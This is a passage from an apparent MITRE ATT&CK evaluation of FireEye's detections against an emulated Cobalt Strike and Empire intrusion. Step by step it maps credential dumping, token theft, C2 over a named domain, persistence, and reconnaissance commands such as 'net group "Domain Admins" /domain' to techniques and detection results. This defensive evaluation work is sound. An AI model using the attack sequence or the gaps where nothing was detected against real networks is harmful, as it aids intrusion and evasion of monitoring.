Excerpt from the Managed Defense Report with additional details about netstat
5.A.1
Cobalt Strike: Built-in Mimikatz credential dump capability executed
Credential Dumping
(T1003)
None
No detection capability demonstrated for this procedure.
Process Injection
(T1055)
None
No detection capability demonstrated for this procedure.
5.A.2
Cobalt Strike: Built-in hash dump capability executed
Credential Dumping
(T1003)
None
No detection capability demonstrated for this procedure.
Process Injection
(T1055)
None
No detection capability demonstrated for this procedure.
5.B.1
Cobalt Strike: Built-in token theft capability executed to change user context to George
Access Token Manipulation
(T1134)
Telemetry
Telemetry showed a process (net.exe) executed during Step 4 as user Debbie and a subsequent process (reg.exe) executed during Step 6 as user George, indicating a change in user context from a stolen token.
Telemetry showing the user Debbie executing net.exe with command-line arguments during Step 4
Telemetry showing the user George executing reg.exe with command-line arguments during Step 6
6.A.1
Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)
Query Registry
(T1012)
Enrichment
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery). An alert was also generated for a File Write To Named Pipe (Weak Signal) for reg.exe.
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified reg.exe as a reconnaissance command to enumerate a Registry key on the host Conficker to determine the configuration of its Windows Terminal Server service. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of reg.exe with Reg Execution alert (tagged with correct ATT&CK Technique, T1012 - Query Registry, and Tactic, Discovery)
File Write To Named Pipe alert for write to remote named pipe from reg.exe
Additional details on named pipe alert
Excerpt from Managed Defense Report of the reg command executing a remote registry query (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about reg query
6.B.1
Cobalt Strike: C2 channel modified
Commonly Used Port
(T1043)
Telemetry
Telemetry showed a connection over port 80 to 192.168.0.4 (C2 server).
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified C2 communication over TCP port 80 to www.freegoogleadsenseinfo.com (C2 domain). Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing port 80 connections to 192.168.0.4 (C2 server)
Excerpt from the Managed Defense Report identifying C2 traffic communicating over TCP port 80 to www.freegoogleadsenseinfo.com (C2 domain) (General Behavior)
Multiband Communication
(T1026)
Telemetry
  
Telemetry showed a combination of both DNS requests as well as HTTP requests, which could indicate multiband communication.
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified C2 communication over TCP port 80 to www.freegoogleadsenseinfo.com (C2 domain) in addition to the ongoing DNS C2. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing DNS requests (field name dnsLookupEvents/Generated) and HTTP requests (field name urlMonitorEvents/Generated)
Excerpt from the Managed Defense Report identifying C2 traffic communicating over TCP port 80 to www.freegoogleadsenseinfo.com (C2 domain) in addition to the ongoing DNS C2 (Specific Behavior)
Standard Application Layer Protocol
(T1071)
Telemetry
  
Telemetry showed HTTP GET requests over port 80 to 192.168.0.4 (C2 server).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified C2 communication over HTTP to www.freegoogleadsenseinfo.com (C2 domain). Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.  
Telemetry showing HTTP GET requests to 192.168.0.4 (C2 server)
Excerpt from the Managed Defense Report identifying C2 traffic communicating over HTTP to www.freegoogleadsenseinfo.com (C2 domain) (General Behavior)
6.C.1
Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)
Remote Desktop Protocol
(T1076)
Enrichment
The capability enriched the RDP connection from rundll32.exe with an alert for RDP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1076 - Remote Desktop Protocol) and Tactic (Lateral Movement).
Enrichment of RDP connection from rundll32.exe with RDP Network Connection alert (tagged with correct ATT&CK Technique, T1076 - Remote Desktop Protocol, and Tactic, Lateral Movement)
7.A.1
Added user Jesse to Conficker (10.0.0.5) through RDP connection
Create Account
(T1136)
Telemetry
Telemetry from Conficker showed the creation of the new user Jesse.
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the creation of a local user account for Jesse on Conficker. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing creation of user Jesse
Excerpt from the Managed Defense Report showing the creation of the user Jesse (Specific Behavior)
Graphical User Interface
(T1061)
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in).
Telemetry showing mmc.exe spawning lusrmgr.msc
Account Discovery
(T1087)
Telemetry
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in), which displays local account information.
Telemetry showing mmc.exe running lusrmgr.msc
7.B.1
Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)
Remote File Copy
(T1105)
Enrichment
The capability enriched updater.dll being written by cmd.exe with an alert for CMD File Write (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and a related ATT&CK Technique (T1059 - Command-Line Interface) and Tactic (Execution).
Telemetry (Tainted)
Telemetry showed the file write for updater.dll into the system32 folder. The telemetry was tainted by the parent AV signature alert for updater.dll.
Enrichment of updater.dll file write by cmd.exe with alert for CMD File Write (tagged with correct ATT&CK Technique, T1105 - Remote File Copy, and related ATT&CK Technique, T1059 - Command-Line Interface, and Tactic, Execution)
Telemetry showing updater.dll file write (tainted by parent AV signature alert)
7.C.1
Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)
Scheduled Task
(T1053)
Enrichment
The capability enriched schtasks.exe with an alert for Scheduled Task Activity (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1053 - Scheduled Task) and Tactics (Execution, Persistence, and Privilege Escalation).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that updater.dll persisted through the creation of a scheduled task. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of schtasks.exe with Scheduled Task Activity alert (tagged with correct ATT&CK Technique, T1053 - Scheduled Task, and Tactics, Execution, Persistence, Privilege Escalation)
Excerpt from the Managed Defense Report indicating updater.dll persisted through a scheduled task (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about schtasks
8.A.1
Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd
File and Directory Discovery
(T1083)
Enrichment
The capability enriched cmd.exe executing dir with an alert for Dir Command (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1083 - File and Directory Discovery) and Tactic (Discovery).
Enrichment of cmd.exe executing dir with Dir Command alert (tagged with correct ATT&CK Technique, T1083 - File and Directory Discovery, and Tactic, Discovery)
8.A.2
Cobalt Strike: 'tree "C:\Users\debbie"' via cmd
File and Directory Discovery
(T1083)
Enrichment
The capability enriched cmd.exe executing tree with an alert for Tree Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1083 - File and Directory Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker performed a directory listing of the contents of Debbie's user profile directory. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of cmd.exe executing tree with Tree Command Execution alert (tagged with correct ATT&CK Technique, T1083 - File and Directory Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report identifying a directory listing of Debbie's profile directory (Specific Behavior)
Excerpt from Managed Defense Report showing additional details about tree
8.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
No detection capability demonstrated for this procedure.
8.C.1
Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie
Input Capture
(T1056)
None
No detection capability demonstrated for this procedure.
Application Window Discovery
(T1010)
None
No detection capability demonstrated for this procedure.
8.D.1
Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie
Screen Capture
(T1113)
None
No detection capability demonstrated for this procedure.
Process Injection
(T1055)
None
No detection capability demonstrated for this procedure.
9.A.1
Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
No detection capability demonstrated for this procedure.
9.B.1
Cobalt Strike: Built-in download capability executed to collect a file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Data from Network Shared Drive
(T1039)
None
No detection capability demonstrated for this procedure.
Exfiltration Over Command and Control Channel
(T1041)
None
No detection capability demonstrated for this procedure, though DNS requests for freegoogleadsenseinfo.com (C2 domain) were observed.
DNS requests to freegoogleadsenseinfo.com (C2 domain) (does not count as a detection)
10.A.1
Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32
Registry Run Keys / Startup Folder
(T1060)
Enrichment
The capability enriched cmd.exe executing a file from Startup with an alert for Process Execution Startup. The alert was also tagged with the correct ATT&CK Technique (T1060 - Registry Run Keys / Startup Folder) and Tactic (Persistence).
Telemetry
Telemetry showed cmd.exe executing autoupdate.bat from the Startup folder.
Telemetry (Tainted)
Telemetry showed rundll32.exe executing update.dat with command-line arguments. The telemetry was tainted by the parent alert for Rundll32 Execution (Weak Signal).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that autoupdate.bat persisted due to its presence in the startup directory. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of cmd.exe executing from Startup with Process Execution Startup alert (tagged with correct ATT&CK Technique, T1060 - Registry Run Keys / Startup Folder, and Tactic, Persistence)
Telemetry showing cmd.exe executing autoupdate.bat from Startup folder
Telemetry showing rundll32.exe executing update.dat (tainted by parent Rundll32 Execution alert)
Additional details of rundll32.exe telemetry
Excerpt from the Managed Defense Report indicating autoupdate.bat persisted due to its presence in startup (Specific Behavior)
10.A.2
Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
Scheduled Task
(T1053)
Telemetry (Tainted)
Telemetry showed svchost.exe executing rundll32.exe, which executed updater.dll. The telemetry was tainted by the parent Rundll32 Execution alert, which was tagged with a related ATT&CK Technique (T1085 - Rundll32) and Tactics (Defense Evasion, Execution), but did not include information on the use of a Scheduled Task specifically.
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the Resume Viewer Update Checker scheduled task executing updater.dll with rundll32.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing rundll32.exe executing updater.dll
Parent Rundll32 Execution alert that tainted updater.dll telemetry (tagged with related ATT&CK Technique, T1085 - Rundll32, and Tactics, Defense Evasion, Execution; does not include specific Scheduled Task information)
Excerpt from Managed Defense Report indicating the Resume Viewer Update Checker scheduled task executed updater.dll with rundll32.exe (Specific Behavior)
10.B.1
RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
Remote Desktop Protocol
(T1076)
Enrichment
The capability enriched a TCP port 3389 connection to 10.0.0.5 (Conficker) with the alert RDP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1076 - Remote Desktop Protocol) and Tactic (Lateral Movement).
Telemetry
Telemetry showed a Logon Type 10 (interactive) event for the account Jesse logging on to Conficker.
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the user account Jesse logged on to Conficker via Remote Desktop Protocol. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of port 3389 connection with RDP Network Connection alert (tagged with correct ATT&CK Technique, T1076 - Remote Desktop Protocol, and Tactic, Lateral Movement)
Telemetry showing Logon Type 10 (interactive) event for Jesse logging on to Conficker
Excerpt from Managed Defense Report indicating account Jesse was used to log on via Remote Desktop Protocol (Specific Behavior)
Valid Accounts
(T1078)
Telemetry
Telemetry showed a Logon Type 10 (interactive) event for the account Jesse logging on to Conficker.
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the account Jesse was used to log in to Conficker as part of Lateral Movement. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing Logon Type 10 (interactive) event for Jesse logging on to Conficker
Excerpt from Managed Defense Report indicating account Jesse was used to log on to Conficker as part of Lateral Movement (Specific Behavior)
11.A.1
Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
Scripting
(T1064)
Specific Behavior
A Specific Behavior alert was generated for Suspicious PowerShell Usage (Methodology) indicating powershell.exe ran with unusual arguments due to the -enc and -noP command-line arguments. The alert was mapped to a related ATT&CK Technique (T1086 - PowerShell) and the correct Tactic (Execution) and captured the encoded command.
Enrichment
The capability enriched wscript.exe with an alert for Wscript Execution (Weak Signal). The alert was tagged with the correct ATT&CK Technique (T1064 - Scripting) and Tactic (Execution).
Indicator of Compromise
An Indicator of Compromise alert was generated for EMPIRE RAT (Backdoor) based on a detected string specific to the backdoor. The alert was also mapped to a related ATT&CK Technique (T1086 - PowerShell).
Specific Behavior alert for Suspicious PowerShell Usage showing powershell.exe execution (tagged with related ATT&CK Technique, T1086 - PowerShell, and correct Tactic, Execution)
Additional details on Specific Behavior alert for Suspicious PowerShell Usage
Enrichment of wscript.exe with Wscript Execution alert (tagged with correct ATT&CK Technique, T1064 - Scripting, and Tactic, Execution)
Indicator of Compromise alert for EMPIRE RAT (tagged with related ATT&CK Technique, T1086 - PowerShell)
11.B.1
Empire: C2 channel established
Commonly Used Port
(T1043)
Telemetry (Tainted)
Telemetry showed powershell.exe communicating over TCP port 443. The telemetry was tainted by the parent PowerShell Network Connection alert.
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire backdoor communicated with 192.168.0.5 (C2 server) over port 443. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing powershell.exe communicating over TCP port 443 (tainted by parent PowerShell Network Connection alert)
Excerpt from the Managed Defense Report indicating Empire communicated over port 443 (General Behavior)
Additional excerpt from the Managed Defense Report indicating Empire was configured to communicate over port 443 (General Behavior)
Standard Application Layer Protocol
(T1071)
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire backdoor was configured to communicate with freegoogleadsenseinfo.com (C2 domain) over HTTPS. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Excerpt from the Managed Defense Report indicating Empire was configured to communicate over HTTPS (General Behavior)
Standard Cryptographic Protocol
(T1032)
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire backdoor was configured to communicate with freegoogleadsenseinfo.com (C2 domain) over HTTPS. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Excerpt from the Managed Defense Report indicating Empire was configured to communicate over HTTPS (General Behavior)
12.A.1
Empire: 'route print' via PowerShell
System Network Configuration Discovery
(T1016)
Enrichment
The capability enriched route.exe with an alert for Route Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery).
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified route.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of route.exe with Route Execution alert (tagged with correct ATT&CK Technique, T1016 - System Network Configuration Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating route.exe was a reconnaissance command used (General Behavior)
12.A.2
Empire: 'ipconfig /all' via PowerShell
System Network Configuration Discovery
(T1016)
Enrichment
The capability enriched ipconfig.exe with an alert for Ipconfig Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery).
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified ipconfig.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of ipconfig.exe with Ipconfig Execution alert (tagged with correct ATT&CK Technique, T1016 - System Network Configuration Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating ipconfig.exe was a reconnaissance command used (General Behavior)
12.B.1
Empire: 'whoami /all /fo list' via PowerShell
System Owner / User Discovery
(T1033)
Enrichment
The capability enriched whoami.exe with an alert for Whoami Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1033 - System Owner/User Discovery) and Tactic (Discovery).
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified whoami.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of whoami.exe with Whoami Execution alert (tagged with correct ATT&CK Technique, T1033 - System Owner/User Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating whoami.exe was a reconnaissance command used (General Behavior)
12.C.1
Empire: 'qprocess *' via PowerShell
Process Discovery
(T1057)
Enrichment
The capability enriched qprocess.exe with an alert for Qprocess Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1057 - Process Discovery) and Tactic (Discovery).
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified qprocess.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of qprocess.exe with Qprocess Execution alert (tagged with correct ATT&CK Technique, T1057 - Process Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating qprocess.exe was a reconnaissance command used (General Behavior)
12.D.1
Empire: 'net start' via PowerShell
System Service Discovery
(T1007)
Enrichment
The capability enriched net.exe with an alert for Net Start Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery).
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Start Command Execution alert (tagged with correct ATT&CK Technique, T1007 - System Service Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net.exe was a reconnaissance command used (General Behavior)
12.E.1
Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
Scripting
(T1064)
Enrichment
The capability enriched powershell.exe with an alert for PowerShell Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1086 - PowerShell).
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that a PowerShell command was run from the Empire process. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of powershell.exe with PowerShell Execution alert (tagged with related ATT&CK Technique, T1086 - PowerShell)
Excerpt from the Managed Defense Report indicating a PowerShell command was run from Empire (Specific Behavior)
12.E.1.1
Empire: WinEnum module included enumeration of user information
System Owner / User Discovery
(T1033)
None
No detection capability demonstrated for this procedure.
12.E.1.2
Empire: WinEnum module included enumeration of AD group memberships
Permission Groups Discovery
(T1069)
None
No detection capability demonstrated for this procedure, though telemetry showed loading of an assembly associated with accessing Active Directory security principals.
Telemetry showing loading of System.DirectoryServices.AccountManagement assembly (does not count as a detection)
12.E.1.3
Empire: WinEnum module included enumeration of password policy information
Password Policy Discovery
(T1201)
None
No detection capability demonstrated for this procedure.
12.E.1.4.1
Empire: WinEnum module included enumeration of recently opened files
File and Directory Discovery
(T1083)
None
No detection capability demonstrated for this procedure.
12.E.1.4.2
Empire: WinEnum module included enumeration of interesting files
File and Directory Discovery
(T1083)
None
No detection capability demonstrated for this procedure.
12.E.1.5
Empire: WinEnum module included enumeration of clipboard contents
Clipboard Data
(T1115)
Indicator of Compromise (Delayed)
The Managed Defense Report indicated an Indicator of Compromise detection occurred because it identified that the attacker executed the Windows Clipboard capability in Empire. The capability separately showed a PowerShell Execution (Weak Signal) alert containing the encoded PowerShell command. This command could be decoded, but this was not counted as a separate detection because it was external to the capability. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Excerpt from the Managed Defense Report indicating the attacker executed the Windows Clipboard capability of Empire (Indicator of Compromise)
PowerShell Execution alert containing encoded PowerShell command (does not count as a detection)
Decoding (outside the capability) of encoded PowerShell command to show Windows.Clipboard details (does not count as a detection)
12.E.1.6.1
Empire: WinEnum module included enumeration of system information
System Information Discovery
(T1082)
None
No detection capability demonstrated for this procedure.
12.E.1.6.2
Empire: WinEnum module included enumeration of Windows update information
System Information Discovery
(T1082)
None
No detection capability demonstrated for this procedure.
12.E.1.7
Empire: WinEnum module included enumeration of system information via a Registry query
Query Registry
(T1012)
None
No detection capability demonstrated for this procedure.
12.E.1.8
Empire: WinEnum module included enumeration of services
System Service Discovery
(T1007)
None
No detection capability demonstrated for this procedure.
12.E.1.9.1
Empire: WinEnum module included enumeration of available shares
Network Share Discovery
(T1135)
None
No detection capability demonstrated for this procedure.
12.E.1.9.2
Empire: WinEnum module included enumeration of mapped network drives
Network Share Discovery
(T1135)
None
No detection capability demonstrated for this procedure.
12.E.1.10.1
Empire: WinEnum module included enumeration of AV solutions
Security Software Discovery
(T1063)
None
No detection capability demonstrated for this procedure.
12.E.1.10.2
Empire: WinEnum module included enumeration of firewall rules
Security Software Discovery
(T1063)
None
No detection capability demonstrated for this procedure.
12.E.1.11
Empire: WinEnum module included enumeration of network adapters
System Network Configuration Discovery
(T1016)
None
No detection capability demonstrated for this procedure.
12.E.1.12
Empire: WinEnum module included enumeration of established network connections
System Network Connections Discovery
(T1049)
Enrichment
The capability enriched netstat.exe with an alert for Netstat Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery).
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified netstat.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of netstat.exe with Netstat Execution alert (tagged with correct ATT&CK Technique, T1049 - System Network Connections Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating netstat.exe was a reconnaissance command used (General Behavior)
12.F.1
Empire: 'net group "Domain Admins" /domain' via PowerShell
Permission Groups Discovery
(T1069)
Enrichment
  
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Group Command Execution alert (tagged with correct ATT&CK Technique, T1069 - Permission Groups Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net.exe was a reconnaissance command used (General Behavior)
12.F.2
Empire: 'net localgroup administrators' via PowerShell
Permission Groups Discovery
(T1069)
Enrichment
  
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with command-line arguments (tagged with correct ATT&CK Technique, T1069 - Permission Groups Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net.exe was a reconnaissance command used (General Behavior)
12.G.1
Empire: 'net user' via PowerShell
Account Discovery
(T1087)
Enrichment
  
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used to capture information about local users. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net User Command Execution alert (tagged with correct ATT&CK Technique, T1087 - Account Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net.exe was a reconnaissance command used to capture information about local users (General Behavior)
12.G.2
Empire: 'net user /domain' via PowerShell
Account Discovery
(T1087)
Enrichment
  
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net User Command Execution alert (tagged with correct ATT&CK Technique, T1087 - Account Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net.exe was a reconnaissance command used (General Behavior)
13.A.1
Empire: 'net group "Domain Computers" /domain' via PowerShell
Remote System Discovery
(T1018)
Enrichment
  
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1018 - Remote System Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Group Command Execution alert (tagged with correct ATT&CK Technique, T1018 - Remote System Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net.exe was a reconnaissance command used (General Behavior)
13.B.1
Empire: 'net use' via PowerShell
System Network Connections Discovery
(T1049)
Enrichment
  
The capability enriched net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Use Command Execution alert (tagged with correct ATT&CK Technique, T1049 - System Network Connections Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net.exe was a reconnaissance command used (General Behavior)
13.B.2
Empire: 'netstat -ano' via PowerShell
System Network Connections Discovery
(T1049)
Enrichment
  
The capability enriched netstat.exe with an alert for Netstat Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified netstat.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of netstat.exe with Netstat Execution alert (tagged with correct ATT&CK Technique, T1049 - System Network Connections Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating netstat.exe was a reconnaissance command used (General Behavior)
13.C.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key
Query Registry
(T1012)
Enrichment
  
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified reg.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of reg.exe with Reg Execution alert (tagged with correct ATT&CK Technique, T1012 - Query Registry, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating reg.exe was a reconnaissance command used (General Behavior)
